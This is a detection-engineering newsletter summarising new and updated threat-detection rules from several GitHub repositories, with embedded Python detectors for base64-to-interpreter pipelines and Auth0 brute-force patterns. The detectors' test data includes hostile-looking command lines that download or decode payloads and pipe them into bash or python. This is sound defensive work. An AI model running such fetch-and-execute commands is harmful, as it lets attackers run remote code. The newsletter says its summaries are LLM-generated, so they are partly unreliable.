Detections Digest #20250303
This week's update highlights the most significant changes to detection rules from 11 of the 40+ monitored GitHub repositories. Between Feb 24 and Mar 3, 2025, contributors added 83 new rules and updated 80 existing ones.
Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Summary
Security teams made major updates across multiple repositories, strengthening detection for container activity, Linux threats, phishing, and cloud security.
FalcoSecurity refined its container monitoring rule for better coverage in k3s environments, while SigmaHQ added a rule to detect CVE-2024-35250 exploitation and improved detection of process memory dumps via Comsvcs.DLL. ReversingLabs expanded its YARA rules with new signatures for Elpaco ransomware and the MiyaRAT backdoor.
Elastic added 12 Linux rules for lateral movement, privilege escalation, and SSH-based attacks. Five Windows rules were also refined for better event filtering.
Sublime Security focused on phishing detection, introducing 6 new rules for QR code and brand impersonation attacks while fine-tuning 13 others to reduce false positives. Anvilogic added 50 (!) new Auth0 rules for credential abuse and MFA monitoring.
Chainguard made 27 rule updates that tune HTTPS traffic monitoring, persistence detection, and privilege escalation signals, and added one new rule. Splunk refined five Windows and cloud security rules, improving detection logic for AD replication, O365 takeovers, and InstallUtil abuse.
In personal repositories, Neo23x0 strengthened YARA-based malware detection with new Lockbit4.0 packer and BabbleLoader rules, while SlimKQL added five new hunting queries for M365, EDR bypass attempts, Exchange Online monitoring, and OSINT-based threat intelligence tracking.
Table Of Contents
falcosecurity/rules (✎1)
SigmaHQ/sigma (+1, ✎1)
reversinglabs/reversinglabs-yara-rules (+2)
elastic/detection-rules (+12, ✎5)
sublime-security/sublime-rules (+6, ✎13)
Yamato-Security/hayabusa-rules (+1)
anvilogic-forge/armory (+50)
chainguard-dev/osquery-defense-kit (+1, ✎27)
splunk/security_content (✎5)
Neo23x0/signature-base (+5, ✎3)
SlimKQL/Hunting-Queries-Detection-Rules (+5)
Corporate repositories (9)
falcosecurity/rules (✎1)
https://github.com/falcosecurity/rules
The team updated the containerd_activities rule to catch paths starting with '/var/lib/rancher/k3s/agent/containerd/' for containerd events (✎containerd_activities). This change aims to improve detection coverage for containerd-related activities in k3s environments.
SigmaHQ/sigma (+1, ✎1)
https://github.com/SigmaHQ/sigma
A new rule detects potential exploitation of CVE-2024-35250 by flagging unusual loading of ksproxy.ax and applying filters for common apps (+Potential CVE-2024-35250 Exploitation Activity).
The detection logic for process memory dumps via Comsvcs.DLL has been modified. It now covers additional command line conditions and includes an updated reference link (✎Process Memory Dump Via Comsvcs.DLL).
reversinglabs/reversinglabs-yara-rules (+2)
https://github.com/reversinglabs/reversinglabs-yara-rules/
ReversingLabs updated its YARA rules. They added a rule to detect Elpaco ransomware using detailed metadata and signature definitions (+Win32_Ransomware_Elpaco). They also added a rule to catch the MiyaRAT backdoor using multiple patterns (+Win64_Backdoor_MiyaRAT).
elastic/detection-rules (+12, ✎5)
https://github.com/elastic/detection-rules
Elastic added 12 new Linux detection rules covering code obfuscation, lateral movement, and SSH abuse. New rules target base64-decoded payloads piped to interpreters (+Base64 Decoded Payload Piped to Interpreter), remote file creation in world-writable directories (+Remote File Creation in World Writeable Directory), and unusual remote file creation (+Unusual Remote File Creation). Rules also detect potential malware-driven SSH brute force attempts (+Potential Malware-Driven SSH Brute Force Attempt) and successful SSH authentications from unusual IP addresses (+Successful SSH Authentication from Unusual IP Address) or with unusual public keys (+Successful SSH Authentication from Unusual SSH Public Key). Additional rules cover a high number of egress network connections from an unusual executable (+High Number of Egress Network Connections from Unusual Executable), user account credential modification via echo (+Linux User Account Credential Modification), kill command execution (+Kill Command Execution), deletion of SSH authorized_keys files (+SSH Authorized Keys File Deletion), unusual file transfer utility launches (+Unusual File Transfer Utility Launched), and unusual base64 encoding/decoding activity (+Unusual Base64 Encoding/Decoding Activity).
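The base64-decode-to-interpreter pattern named above is worth seeing as executable logic. The Python below is an added example written for this digest, not Elastic's rule (which is expressed in Elastic's own query language against process events): it splits a captured command line into pipeline stages, flags a decode stage followed by an interpreter stage, and recurses into `sh -c '...'` wrappers so the pipeline hidden inside a quoted script is still seen. The interpreter and decoder lists and the sample command lines are this example's own assumptions.

```python
"""Added example for this digest (not Elastic's rule): flag shell command lines
where base64-decoded data is piped into an interpreter."""
import shlex
from typing import Optional

# Programs that execute whatever arrives on stdin (list assumed for this example).
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "ash",
                "python", "python2", "python3", "perl", "ruby", "php", "node"}


def _basename(tok: str) -> str:
    return tok.rsplit("/", 1)[-1]


def _pipe_stages(cmdline: str) -> list:
    """Split on '|' while honouring shell quoting. Returns (separator_before, tokens)
    pairs; '||' is a logical OR, not a pipe, and is kept distinct for that reason."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars="|")
    lex.whitespace_split = True
    stages, current, sep = [], [], ""
    for tok in lex:
        if tok in ("|", "||"):
            stages.append((sep, current))
            current, sep = [], tok
        else:
            current.append(tok)
    stages.append((sep, current))
    return stages


def _is_b64_decoder(stage: list) -> bool:
    name, args = _basename(stage[0]), stage[1:]
    if name == "base64":
        # GNU/busybox -d/--decode, BSD and macOS -D, clustered short flags (-di).
        return any(a in ("-d", "-D", "--decode")
                   or (a.startswith("-") and not a.startswith("--") and "d" in a[1:])
                   for a in args)
    if name == "openssl" and args:
        # `openssl base64 -d ...` or `openssl enc -d -a ...` / `-base64`
        return "-d" in args and (args[0] == "base64" or
                                 (args[0] == "enc" and ("-a" in args or "-base64" in args)))
    return False


def _is_interpreter(stage: list) -> bool:
    return _basename(stage[0]) in INTERPRETERS


def detect_b64_pipe_to_interpreter(cmdline: str) -> Optional[dict]:
    """Return {'decoder': ..., 'interpreter': ...} when a base64 decode stage is
    followed, possibly through filters such as gunzip, by an interpreter stage in
    the same pipeline; None otherwise. Recurses into `sh -c '...'` wrappers.
    Known gaps: eval "$(... | base64 -d)" and decoding inside python -c are missed."""
    try:
        stages = _pipe_stages(cmdline)
    except ValueError:              # unbalanced quotes: not a parseable shell line
        return None
    decoder_seen = None
    for sep_before, stage in stages:
        if sep_before == "||":
            decoder_seen = None     # a new command list starts; nothing flows across
        if not stage:
            continue
        if _is_b64_decoder(stage):
            decoder_seen = " ".join(stage)
        elif decoder_seen and _is_interpreter(stage):
            return {"decoder": decoder_seen, "interpreter": " ".join(stage)}
        if _is_interpreter(stage) and "-c" in stage:
            i = stage.index("-c")
            if i + 1 < len(stage):
                hit = detect_b64_pipe_to_interpreter(stage[i + 1])
                if hit:
                    return hit
    return None


# Constructed command lines for the demo; the first four should alert.
SAMPLE_CMDLINES = [
    "echo aGk= | base64 -d | bash",
    'bash -c "curl -s http://example.invalid/p | base64 --decode | python3"',
    "cat payload.b64 | base64 -d | gunzip | sh",
    "openssl base64 -d -in p.txt | perl",
    "base64 -w0 secret.txt | tee out.txt",       # encoding, not decoding
    "echo data | base64 -d > out.bin",           # decoded to a file, no interpreter
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        hit = detect_b64_pipe_to_interpreter(line)
        print(("ALERT " if hit else "ok    ") + line)
```

The separator bookkeeping matters: `base64 -d x || bash` is not a pipe into bash, and a detection that simply greps for `base64 -d` and `bash` on the same line would fire on it. Run against real process telemetry, the remaining false negatives are the ones the docstring lists, which is why Elastic pairs this pattern with a broader unusual-base64-activity rule.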
Updates were also made to Windows rules. The modifications refine event filtering and query logic to improve detection accuracy. Updated rules include the one for privilege escalation via named pipe impersonation (✎Privilege Escalation via Rogue Named Pipe Impersonation), remote file copy to hidden share (✎Remote File Copy to a Hidden Share), AMSI bypass via PowerShell (✎Potential Antimalware Scan Interface Bypass via PowerShell), file transfer via curl (✎Potential File Transfer via Curl for Windows) and file creation time modifications (✎File Creation Time Changed).
sublime-security/sublime-rules (+6, ✎13)
https://github.com/sublime-security/sublime-rules
Sublime Security has added multiple detection rules that target phishing and impersonation through QR codes, open redirects, and unusual sender characteristics. The new rules identify attachments with QR codes that embed Base64 email addresses (+Attachment: QR Code Link With Base64-Encoded Recipient Address) and Unicode-based QR codes (+Unicode QR Code). They also added rules to catch open redirects to convertcart.com (+Open Redirect: convertcart.com), callback phishing via Zelle (+Callback phishing via Zelle Service Abuse), Social Security Administration fraud attempts (+Callback Phishing: Social Security Administration Fraud), and messages with long local parts from untrusted senders (+Unusually Long Local Part From Untrusted Sender Address).
Several rules were updated to improve detection accuracy and reduce false positives. The detection logic for image and PDF attachments in callback phishing was refined (✎Attachment: Callback Phishing solicitation via image file, ✎Attachment: Callback Phishing solicitation via pdf file). Updates also improved matching conditions for brand impersonation of Adobe via QR codes (✎Brand impersonation: Adobe (QR code)), MetaMask (✎Brand Impersonation: MetaMask), Binance (✎Brand impersonation: Binance), and Quickbooks (✎Brand impersonation: Quickbooks). Additional updates refine rules for callback phishing in the email body (✎Callback Phishing solicitation in message body), QR codes with suspicious language (✎Link: QR Code with suspicious language (untrusted sender)), credential phishing language from unknown senders (✎Credential phishing language and suspicious indicators (unknown sender)), suspicious RFQ/RFP activity (✎Request for Quote or Purchase (RFQ|RFP) with suspicious sender or recipient pattern), and cross-site scripting in subject lines (✎Suspected Cross-Site Scripting (XSS) found in subject).
Yamato-Security/hayabusa-rules (+1)
https://github.com/Yamato-Security/hayabusa-rules
The team at Yamato-Security added a rule to detect potential exploitation using CVE-2024-35250. The rule flags suspicious loading of "ksproxy.ax" that may signal a privilege escalation attack (+Potential CVE-2024-35250 Exploitation Activity).
anvilogic-forge/armory (+50)
https://github.com/anvilogic-forge/armory
The team at anvilogic-forge added a large set of Auth0 rules that boost detection of brute-force, credential stuffing, and automated login failures. Rules cover excessive login failures, both for multiple accounts and single IPs, as well as general failed logins and incorrect credentials (+Auth0: Excessive Login Failures or Signups, +Auth0: Excessive Login Failures for Single Account, +Auth0: Excessive Login Failures from Single IP, +Auth0: Failed Login, +Auth0: Incorrect Password, +Auth0: Invalid Email_Username).
A second set of rules targets multifactor authentication. They monitor updates, unenrollments, failed enrollment attempts, rejected or failed MFA events, and even a successful MFA login after repeated failures (+Auth0: MFA Device Updated, +Auth0: MFA Device Unenrolled, +Auth0: MFA Authentication Failed, +Auth0: MFA Enrollment Failed, +Auth0: MFA Enrollment Started, +Auth0: MFA Notification Failure, +Auth0: Failed Voice Call for MFA, +Auth0: Successful MFA Login After Multiple Failures).
New rules also address token management and exchange. They monitor failed refresh and access token exchanges, CIBA token exchange failures, and abnormal passwordless login code or link events (+Auth0: Failed Refresh Token Exchange, +Auth0: Failed Access Token Exchange, +Auth0: Failed CIBA Token Exchange Attempt, +Auth0: Passwordless Login Code or Link Sent).
Additional rules cover changes in user management and configuration events. They record guardian tenant updates that can weaken MFA, warnings during user operations, email notification or verification failures, failed invitation acceptances, organization member additions, and SSO ticket issues (+Auth0: Guardian tenant update, +Auth0: User management warning events, +Auth0: Email Notification Failure, +Auth0: Email Verification Failed, +Auth0: Failed to Accept User Invitation, +Auth0: Member Added to Organization, +Auth0: SSO Ticket Failure, +Auth0: User Block Released from Anomaly Detection, +Auth0: User Created).
Other updates add detections for high volume operations and misconfigurations. These rules monitor spikes in authentication attempts, API rate limit increases, OTP abuse, OIDC back-channel logout failures, failed username changes, device rejections, and native social logins (+Auth0: High volume auth attempts, +Auth0: API Rate Limit Increased, +Auth0: OTP Rate Limit Exceeded, +Auth0: OIDC Back-Channel Logout Failed, +Auth0: Failed username change, +Auth0: Device Rejected by User, +Auth0: Native Social Login, +Auth0: Resources Exceeding Defined Limits Removed).
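The login-failure and MFA rules above are threshold detections over Auth0 tenant logs. As an added example for this digest (not Anvilogic's rule content, which is written for their platform), the Python below runs three such thresholds over constructed Auth0-style log records: failures from one IP across several accounts, failures against one account, and an MFA success preceded by repeated MFA failures. The event type codes follow Auth0's log-event reference as this editor knows it and should be checked against your tenant; the thresholds, window, alert titles (borrowed from the rule names above), and sample records are assumptions for illustration.

```python
"""Added example for this digest (not Anvilogic's rule content): threshold
detections over Auth0 tenant log records for credential stuffing, brute force
and MFA fatigue."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Auth0 log event type codes as the author knows them from Auth0's public
# log-event reference (assumption: verify against your own tenant's logs).
FAILED_LOGIN_TYPES = {"f", "fp", "fu"}   # failed login / wrong password / unknown user
MFA_FAILED, MFA_SUCCESS = "gd_auth_failed", "gd_auth_succeed"

# Thresholds and window chosen for this example; tune them to your tenant.
WINDOW = timedelta(minutes=10)
IP_FAILURES, IP_DISTINCT_USERS = 5, 3     # one source hitting many accounts
ACCOUNT_FAILURES = 5                       # many failures against one account
MFA_FAILURES_BEFORE_SUCCESS = 3            # push fatigue / OTP guessing


def _ts(iso: str) -> datetime:
    # Auth0 dates end in 'Z'; fromisoformat() on older Pythons wants '+00:00'.
    return datetime.fromisoformat(iso.replace("Z", "+00:00"))


def _trim(history: deque, now: datetime) -> None:
    """Drop entries older than WINDOW; entries are (timestamp, detail) tuples."""
    while history and now - history[0][0] > WINDOW:
        history.popleft()


def detect_auth0(events: list) -> list:
    """One pass over Auth0 log records in time order. Each rule fires at most once
    per key (IP or user) so a burst does not yield one alert per event."""
    ip_hist = defaultdict(deque)     # ip   -> (ts, user_name) of failed logins
    user_hist = defaultdict(deque)   # user -> (ts, ip) of failed logins
    mfa_hist = defaultdict(deque)    # user -> (ts, ip) of MFA failures
    alerts, fired = [], set()

    def fire(rule, key, **details):
        if (rule, key) not in fired:
            fired.add((rule, key))
            alerts.append({"rule": rule, "key": key, **details})

    for e in sorted(events, key=lambda ev: _ts(ev["date"])):
        now, kind = _ts(e["date"]), e["type"]
        user, ip = e.get("user_name"), e.get("ip")
        if kind in FAILED_LOGIN_TYPES:
            ip_hist[ip].append((now, user))
            _trim(ip_hist[ip], now)
            user_hist[user].append((now, ip))
            _trim(user_hist[user], now)
            targets = sorted({u for _, u in ip_hist[ip]}, key=str)
            if len(ip_hist[ip]) >= IP_FAILURES and len(targets) >= IP_DISTINCT_USERS:
                fire("Auth0: Excessive Login Failures from Single IP", ip,
                     failures=len(ip_hist[ip]), accounts=targets)
            if len(user_hist[user]) >= ACCOUNT_FAILURES:
                fire("Auth0: Excessive Login Failures for Single Account", user,
                     failures=len(user_hist[user]),
                     source_ips=sorted({i for _, i in user_hist[user]}, key=str))
        elif kind == MFA_FAILED:
            mfa_hist[user].append((now, ip))
            _trim(mfa_hist[user], now)
        elif kind == MFA_SUCCESS:
            _trim(mfa_hist[user], now)
            if len(mfa_hist[user]) >= MFA_FAILURES_BEFORE_SUCCESS:
                fire("Auth0: Successful MFA Login After Multiple Failures", user,
                     prior_failures=len(mfa_hist[user]), ip=ip)
    return alerts


# Constructed Auth0-style records (not real tenant data). Only the fields the
# rules read are included; real records carry many more.
SAMPLE_LOGS = [
    # one IP, six accounts, six failures in 25 seconds -> credential stuffing
    *[{"date": f"2025-02-25T10:00:{i * 5:02d}.000Z", "type": "fu" if i % 2 else "fp",
       "ip": "203.0.113.7", "user_name": f"user{i}@example.com"} for i in range(6)],
    # five bad passwords on one account, then a success -> brute force
    *[{"date": f"2025-02-25T10:05:{i * 10:02d}.000Z", "type": "fp",
       "ip": "198.51.100.5", "user_name": "cfo@example.com"} for i in range(5)],
    {"date": "2025-02-25T10:06:30.000Z", "type": "s",
     "ip": "198.51.100.5", "user_name": "cfo@example.com"},
    # three MFA failures then an MFA success -> push fatigue / OTP guessing
    *[{"date": f"2025-02-25T10:10:{i * 20:02d}.000Z", "type": "gd_auth_failed",
       "ip": "198.51.100.23", "user_name": "admin@example.com"} for i in range(3)],
    {"date": "2025-02-25T10:12:00.000Z", "type": "gd_auth_succeed",
     "ip": "198.51.100.23", "user_name": "admin@example.com"},
    # benign: two typos from a normal user -> below threshold
    {"date": "2025-02-25T10:20:00.000Z", "type": "fp", "ip": "192.0.2.9", "user_name": "bob@example.com"},
    {"date": "2025-02-25T10:20:15.000Z", "type": "fp", "ip": "192.0.2.9", "user_name": "bob@example.com"},
    # stale failure from the stuffing IP, two hours earlier: outside the window
    {"date": "2025-02-25T08:00:00.000Z", "type": "fp", "ip": "203.0.113.7", "user_name": "old@example.com"},
]

if __name__ == "__main__":
    for alert in detect_auth0(SAMPLE_LOGS):
        print(alert)
```

Two design points carry over to any SIEM implementation of these rules: the per-IP rule should require distinct target accounts, otherwise a single user retrying a bad password trips the credential-stuffing alert, and the MFA rule keys on the success event so the alert lands on the login that actually went through, with the prior failure count attached as context for the responder.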
chainguard-dev/osquery-defense-kit (+1, ✎27)
https://github.com/chainguard-dev/osquery-defense-kit
The team added a new rule to flag processes spawned by executables with matching ctime and mtime, a sign of possible timestomping activity (+Touched Executable Detection).
Detection logic for HTTPS communications was updated on both Linux and macOS. Changes include adding exceptions for processes like argo, minecraft-launcher, git-remote-http, zig, apkoaas, licenseDaemon, and proctor while removing or updating obsolete exceptions such as art, multipassd, and firefox-bin (✎Unexpected programs communicating over HTTPS (state-based) – Linux, ✎Unexpected programs communicating over HTTPS (state-based) – macOS).
Other rules were refined to reduce false positives and improve coverage. Updates include adjusted exclusion lists and WHERE clauses in rules for high disk bytes written, high disk bytes read, unexpected DNS traffic, user executables on macOS, unexpected PCAP user activity, suspicious fetch tool parenting, execution directory on Linux, and unexpected disk image sources (✎High Disk Bytes Written Detection, ✎High Disk Bytes Read Detection, ✎Catch DNS traffic going to machines other than the host-configured DNS server, ✎Unexpected User Executables on MacOS, ✎Unexpected PCAP User Detection, ✎Suspicious parenting of fetch tools, ✎Unexpected Execution Directory – Linux, ✎Unexpected Disk Image Source Detection).
Additional tweaks were made in rules for keylogging and privileged container detection. New exceptions were added for keyboard sniffer detections and updates to command filters now ignore commands like '/bin/k3s server' (✎macOS Keyboard Sniffer, ✎Unexpected Privileged Containers Detection).
splunk/security_content (✎5)
https://github.com/splunk/security_content
The team at Splunk improved detection accuracy by modifying several rules. The Windows AD Replication Request Initiated by User Account rule received an updated search query and corrected false-positive notes (✎Windows AD Replication Request Initiated by User Account). The O365 Email Receive and Hard Delete Takeover Behavior rule dropped the ClientProcessName field and its True Positive Test section, adjusting the testing strategy (✎O365 Email Receive and Hard Delete Takeover Behavior).
The Windows InstallUtil Remote Network Connection rule now uses new field names and better data aggregation for process and network tracking (✎Windows InstallUtil Remote Network Connection). The Windows PowerShell Process With Malicious String (✎Windows PowerShell Process With Malicious String) and Windows System Remote Discovery With Query (✎Windows System Remote Discovery With Query) rules received version bumps only, with the underlying search logic unchanged.
Personal repositories (2)
Neo23x0/signature-base (+5, ✎3)
https://github.com/Neo23x0/signature-base
New YARA rules target Lockbit4.0 by detecting its packer, RC4 use, and custom hashing algorithm (+mal_lockbit4_packed_feb24, +Detect the implementation of RC4 Algorithm by Lockbit4.0, +mal_lockbit4_hashing_alg_win_feb24). The packer rule was updated with improved jump and unpacking string patterns (✎mal_lockbit4_packed_feb24).
A new BabbleLoader detection rule was added (+mal_babbleloader_win_jan24) and then updated to adjust string matching for decryption, hashing, and related markers (✎mal_babbleloader_win_jan24).
A new rule to spot email redirection spoofing was added (+SUSP_Email_Redirection_Spoofing_Feb25) and updated to switch from regex conditions to a more direct string match approach (✎SUSP_Email_Redirection_Spoofing_Feb25).
SlimKQL/Hunting-Queries-Detection-Rules (+5)
https://github.com/SlimKQL/Hunting-Queries-Detection-Rules
SlimKQL added five new queries that broaden detection coverage.
The Exploring M365 Accounts Investigation query tracks M365 logins and cloud app events linked to VPN use (+Exploring M365 Accounts Investigation). The EDR and AV Killer query looks for driver exploitation using legacy Truesight.sys variants over a 90-day window (+EDR and AV Killer - A Large Scale Driver Exploitation Detection).
A new query calculates outbound email traffic in Exchange Online for the past 30 days to spot unusual volume changes (+Tenant External Recipient Rate Limit (TERR)). Additionally, two new queries use external threat intel: the DefenderXDR Weekly OSINT Indicators Scan pulls in multiple indicator types over a 30-day period (+DefenderXDR Weekly OSINT Indicators Scan) and the GitLab Threat Intelligence rule flags 16 malicious Chrome extensions (+GitLab Threat Intelligence Identified 16 Malicious Chrome extensions).
Feedback
Your input helps us improve! We'd love to hear from you if you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.
Disclaimer
The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is made possible through our partnership with BlackStork, combining their content generation technology with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.